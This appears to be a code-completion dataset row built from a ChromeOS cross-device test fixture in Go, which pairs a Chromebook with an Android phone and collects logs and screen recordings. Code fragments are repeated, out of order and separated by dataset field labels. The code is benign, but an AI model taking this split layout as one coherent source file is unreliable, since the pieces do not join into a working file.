s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
}
func (f *crossdeviceFixture) TearDown(ctx context.Context, s *testing.FixtState) {
if f.lockFixture {
chrome.Unlock()
if err := f.cr.Close(ctx); err != nil {
s.Log("Failed to close Chrome connection: ", err)
}
}
f.cr = nil
}
func (f *crossdeviceFixture) Reset(ctx context.Context) error {
if err := f.cr.Responded(ctx); err != nil {
return errors.Wrap(err, "existing Chrome connection is unusable")
}
if err := f.cr.ResetState(ctx); err != nil {
return errors.Wrap(err, "failed resetting existing Chrome session")
}
return nil
}
func (f *crossdeviceFixture) PreTest(ctx context.Context, s *testing.FixtTestState) {
if err := saveDeviceAttributes(f.crosAttributes, f.androidAttributes, filepath.Join(s.OutDir(), "device_attributes.json")); err != nil {
s.Error("Failed to save device attributes: ", err)
}
f.btsnoopCmd = bluetooth.StartBTSnoopLogging(s.TestContext(), filepath.Join(s.OutDir(), "crossdevice-btsnoop.log"))
if err := f.btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
if f.logMarker != nil {
s.Log("A log marker is already created but not cleaned up")
}
logMarker, err := logsaver.NewMarker(f.cr.LogFilename())
if err == nil {
f.logMarker = logMarker
} else {
s.Log("Failed to start the log saver: ", err)
}
timestamp, err := f.androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
f.logcatStartTime = timestamp
if f.saveScreenRecording {
if f.kb == nil {
// Use virtual keyboard since uiauto.StartRecordFromKB assumes F5 is the overview key.
kb, err := input.VirtualKeyboard(ctx)
if err != nil {
s.Fatal("Failed to setup keyboard for screen recording: ", err)
}
f.kb = kb
}
if err := uiauto.StartRecordFromKB(ctx, f.tconn, f.kb, f.downloadsPath); err != nil {
s.Fatal("Failed to start screen recording on CrOS: ", err)
}
saveScreen, err := f.androidDevice.StartScreenRecording(s.TestContext(), "android-screen", s.OutDir())
if err != nil {
s.Fatal("Failed to start screen recording on Android: ", err)
}
f.saveAndroidScreenRecordingOnError = saveScreen
}
}
func (f *crossdeviceFixture) PostTest(ctx context.Context, s *testing.FixtTestState) {
if err := f.btsnoopCmd.Kill(); err != nil {
s.Error("Failed to stop btsnoop log capture: ", err)
}
f.btsnoopCmd.Wait()
f.btsnoopCmd = nil
if f.logMarker != nil {
if err := f.logMarker.Save(filepath.Join(s.OutDir(), "chrome.log")); err != nil {
s.Log("Failed to store per-test log data: ", err)
}
f.logMarker = nil
}
// Restore connection to the ADB-over-WiFi device if it was lost during the test.
// This is needed for Instant Tether tests that disable WiFi on the Chromebook which interrupts the ADB connection.
if PhoneIP.Value() != "" && f.androidDevice.Device.IsConnected(ctx) != nil {
s.Log("Connection to ADB device lost, restaring")
device, err := AdbOverWifi(ctx)
if err != nil {
s.Fatal("Failed to re-initialize adb-over-wifi: ", err)
}
f.androidDevice.Device = device
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
s.Fatal("Failed to reconnect to the snippet: ", err)
}
}
if err := f.androidDevice.Device.DumpLogcatFromTimestamp(ctx, filepath.Join(s.OutDir(), "crossdevice-logcat.txt"), f.logcatStartTime); err != nil {
s.Fatal("Failed to save logcat logs from the test: ", err)
}
if err := f.androidDevice.DumpLogs(ctx, s.OutDir(), "crossdevice-persistent-logcat.txt"); err != nil {
s.Fatal("Failed to save persistent logcat logs: ", err)
}
if f.saveScreenRecording {
if err := f.saveAndroidScreenRecordingOnError(ctx, s.HasError); err != nil {
s.Fatal("Failed to save Android screen recording: ", err)
}
f.saveAndroidScreenRecordingOnError = nil
ui := uiauto.New(f.tconn)
var crosRecordErr error
if err := ui.Exists(uiauto.ScreenRecordStopButton)(ctx); err != nil {
// Smart Lock tests automatically stop the screen recording when they lock the screen.
// The screen recording should still exist though.
crosRecordErr = uiauto.SaveRecordFromKBOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
} else {
crosRecordErr = uiauto.StopRecordFromKBAndSaveOnError(ctx, f.tconn, s.HasError, s.OutDir(), f.downloadsPath)
}
if crosRecordErr != nil {
s.Fatal("Failed to save CrOS screen recording: ", crosRecordErr)
}
}
if s.HasError() {
if err := BugReport(ctx, f.androidDevice.Device, s.OutDir()); err != nil {
s.Error("Failed to save Android bug report: ", err)
}
}
}
// Verify that pairing between Android and Chromebook is successful.
func (f *crossdeviceFixture) PairWithAndroid(ctx context.Context, tconn *chrome.TestConn, cr *chrome.Chrome) error {
if err := f.androidDevice.Pair(ctx); err != nil {
if err := f.androidDevice.ReconnectToSnippet(ctx); err != nil {
return errors.Wrap(err, "failed to reconnect to the snippet server")
}
if err := f.androidDevice.Pair(ctx); err != nil {
return errors.Wrap(err, "failed to connect the Android device to CrOS")
}
}
if err := crossdevicesettings.WaitForConnectedDevice(ctx, tconn, cr); err != nil {
return errors.Wrap(err, "failed waiting for the connected device to appear in OS settings")
}
return nil
}
// saveDeviceAttributes saves the CrOS and Android device attributes as a formatted JSON at the specified filepath.
func saveDeviceAttributes(crosAttrs *crossdevicecommon.CrosAttributes, androidAttrs *AndroidAttributes, filepath string) error {
attributes := struct {
CrOS *crossdevicecommon.CrosAttributes
Android *AndroidAttributes
}{CrOS: crosAttrs, Android: androidAttrs}
crosLog, err := json.MarshalIndent(attributes, "", "\t")
if err != nil {
return errors.Wrap(err, "failed to format device metadata for logging")
}
if err := ioutil.WriteFile(filepath, crosLog, 0644); err != nil {
return errors.Wrap(err, "failed to write CrOS attributes to output file")
}
return nil
}
// ConnectToWifi connects the chromebook to the Wifi network in its RF box.
func | ConnectToWifi | identifier_name | |
fixture.go | with all Cross Device features enabled with lacros enabled",
Contacts: []string{
"kyleshima@chromium.org",
"chromeos-sw-engprod@google.com",
},
Parent: "crossdeviceAndroidSetupPhoneHub",
Impl: NewCrossDeviceOnboarded(FixtureOptions{true, true, true, false}, func(ctx context.Context, s *testing.FixtState) ([]chrome.Option, error) {
return lacrosfixt.NewConfig().Opts()
}),
Vars: []string{
customCrOSUsername,
customCrOSPassword,
KeepStateVar,
},
SetUpTimeout: 10*time.Minute + BugReportDuration,
ResetTimeout: resetTimeout,
TearDownTimeout: resetTimeout,
PreTestTimeout: resetTimeout,
PostTestTimeout: postTestTimeout,
})
}
type crossdeviceFixture struct {
fOpt chrome.OptionsCallback // Function to generate Chrome Options
cr *chrome.Chrome
tconn *chrome.TestConn
kb *input.KeyboardEventWriter
androidDevice *AndroidDevice
androidAttributes *AndroidAttributes
crosAttributes *crossdevicecommon.CrosAttributes
btsnoopCmd *testexec.Cmd
logMarker *logsaver.Marker // Marker for per-test log.
allFeatures bool
saveAndroidScreenRecordingOnError func(context.Context, func() bool) error
saveScreenRecording bool
lockFixture bool
noSignIn bool
logcatStartTime adb.LogcatTimestamp
downloadsPath string
}
// FixtData holds information made available to tests that specify this Fixture.
type FixtData struct {
// Chrome is the running chrome instance.
Chrome *chrome.Chrome
// TestConn is a connection to the test extension.
TestConn *chrome.TestConn
// Connection to the lock screen test extension.
LoginConn *chrome.TestConn
// AndroidDevice is an object for interacting with the connected Android device's Multidevice Snippet.
AndroidDevice *AndroidDevice
// The credentials to be used on both chromebook and phone.
Username string
Password string
// The options used to start Chrome sessions.
ChromeOptions []chrome.Option
}
func (f *crossdeviceFixture) SetUp(ctx context.Context, s *testing.FixtState) interface{} {
// Android device from parent fixture.
androidDevice := s.ParentValue().(*FixtData).AndroidDevice
f.androidDevice = androidDevice
// Credentials to use (same as Android).
crosUsername := s.ParentValue().(*FixtData).Username
crosPassword := s.ParentValue().(*FixtData).Password
// Allocate time for logging and saving a screenshot and bugreport in case of failure.
cleanupCtx := ctx
ctx, cancel := ctxutil.Shorten(ctx, 10*time.Second+BugReportDuration)
defer cancel()
// Save logcat so we have Android logs even if fixture setup fails.
startTime, err := androidDevice.Device.LatestLogcatTimestamp(ctx)
if err != nil {
s.Fatal("Failed to get latest logcat timestamp: ", err)
}
defer androidDevice.Device.DumpLogcatFromTimestamp(cleanupCtx, filepath.Join(s.OutDir(), "fixture_setup_logcat.txt"), startTime)
defer androidDevice.DumpLogs(cleanupCtx, s.OutDir(), "fixture_setup_persistent_logcat.txt")
// Set default chrome options.
opts, err := f.fOpt(ctx, s)
if err != nil {
s.Fatal("Failed to obtain Chrome options: ", err)
}
tags := []string{
"*nearby*=3",
"*cryptauth*=3",
"*device_sync*=3",
"*multidevice*=3",
"*secure_channel*=3",
"*phonehub*=3",
"*blue*=3",
"ble_*=3",
}
opts = append(opts, chrome.ExtraArgs("--enable-logging", "--vmodule="+strings.Join(tags, ",")))
opts = append(opts, chrome.EnableFeatures("PhoneHubCameraRoll", "SmartLockUIRevamp", "OobeQuickStart"))
customUser, userOk := s.Var(customCrOSUsername)
customPass, passOk := s.Var(customCrOSPassword)
if userOk && passOk {
s.Log("Logging in with user-provided credentials")
crosUsername = customUser
crosPassword = customPass
} else {
s.Log("Logging in with default GAIA credentials")
}
if f.noSignIn {
opts = append(opts, chrome.DontSkipOOBEAfterLogin())
} else {
opts = append(opts, chrome.GAIALogin(chrome.Creds{User: crosUsername, Pass: crosPassword}))
}
if val, ok := s.Var(KeepStateVar); ok {
b, err := strconv.ParseBool(val)
if err != nil {
s.Fatalf("Unable to convert %v var to bool: %v", KeepStateVar, err)
}
if b {
opts = append(opts, chrome.KeepState())
}
}
cr, err := chrome.New(
ctx,
opts...,
)
if err != nil {
s.Fatal("Failed to start Chrome: ", err)
}
f.cr = cr
tconn, err := cr.TestAPIConn(ctx)
if err != nil {
s.Fatal("Creating test API connection failed: ", err)
}
f.tconn = tconn
defer faillog.DumpUITreeWithScreenshotOnError(cleanupCtx, s.OutDir(), s.HasError, cr, "fixture")
// Capture a bug report on the Android phone if any onboarding/setup fails.
defer func() {
if s.HasError() {
if err := BugReport(ctx, androidDevice.Device, s.OutDir()); err != nil {
s.Log("Failed to save Android bug report: ", err)
}
}
}()
// Capture btsnoop logs during fixture setup to have adequate logging during the onboarding phase.
btsnoopCmd := bluetooth.StartBTSnoopLogging(ctx, filepath.Join(s.OutDir(), "crossdevice-fixture-btsnoop.log"))
if err := btsnoopCmd.Start(); err != nil {
s.Fatal("Failed to start btsnoop logging: ", err)
}
defer btsnoopCmd.Wait()
defer btsnoopCmd.Kill()
// Enable bluetooth debug logging.
levels := bluetooth.LogVerbosity{
Bluez: true,
Kernel: true,
}
if err := bluetooth.SetDebugLogLevels(ctx, levels); err != nil {
return errors.Wrap(err, "failed to enable bluetooth debug logging")
}
// Phone and Chromebook will not be paired if we are not signed in to the Chromebook yet.
if !f.noSignIn {
// Sometimes during login the tcp connection to the snippet server on Android is lost.
// If the Pair RPC fails, reconnect to the snippet server and try again.
if err := f.PairWithAndroid(ctx, tconn, cr); err != nil {
s.Fatal("Pairing with Android failed: ", err)
}
if f.allFeatures {
// Wait for the "Smart Lock is turned on" notification to appear,
// since it will cause Phone Hub to close if it's open before the notification pops up.
if _, err := ash.WaitForNotification(ctx, tconn, 30*time.Second, ash.WaitTitleContains("Smart Lock is turned on")); err != nil {
s.Log("Smart Lock notification did not appear after 30 seconds, proceeding anyways")
}
if err := phonehub.Enable(ctx, tconn, cr); err != nil {
s.Fatal("Failed to enable Phone Hub: ", err)
}
if err := phonehub.Hide(ctx, tconn); err != nil {
s.Fatal("Failed to hide Phone Hub after enabling it: ", err)
}
if err := androidDevice.EnablePhoneHubNotifications(ctx); err != nil {
s.Fatal("Failed to enable Phone Hub notifications: ", err)
}
}
if _, err := ash.WaitForNotification(ctx, tconn, 90*time.Second, ash.WaitTitleContains("Connected to")); err != nil {
s.Fatal("Did not receive notification that Chromebook and Phone are paired")
}
}
// Store Android attributes for reporting.
androidAttributes, err := androidDevice.GetAndroidAttributes(ctx)
if err != nil {
s.Fatal("Failed to get Android attributes for reporting: ", err)
}
f.androidAttributes = androidAttributes
// Store CrOS test metadata for reporting.
crosAttributes, err := GetCrosAttributes(ctx, tconn, crosUsername)
if err != nil {
s.Fatal("Failed to get CrOS attributes for reporting: ", err)
}
f.crosAttributes = crosAttributes
// Get the user's Download path for saving screen recordings.
f.downloadsPath, err = cryptohome.DownloadsPath(ctx, f.cr.NormalizedUser())
if err != nil {
s.Fatal("Failed to get user's Downloads path: ", err)
}
// Lock chrome after all Setup is complete so we don't block other fixtures.
if f.lockFixture {
chrome.Lock()
}
return &FixtData{
Chrome: cr,
TestConn: tconn,
AndroidDevice: androidDevice,
Username: crosUsername,
Password: crosPassword,
ChromeOptions: opts,
}
} | random_line_split |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.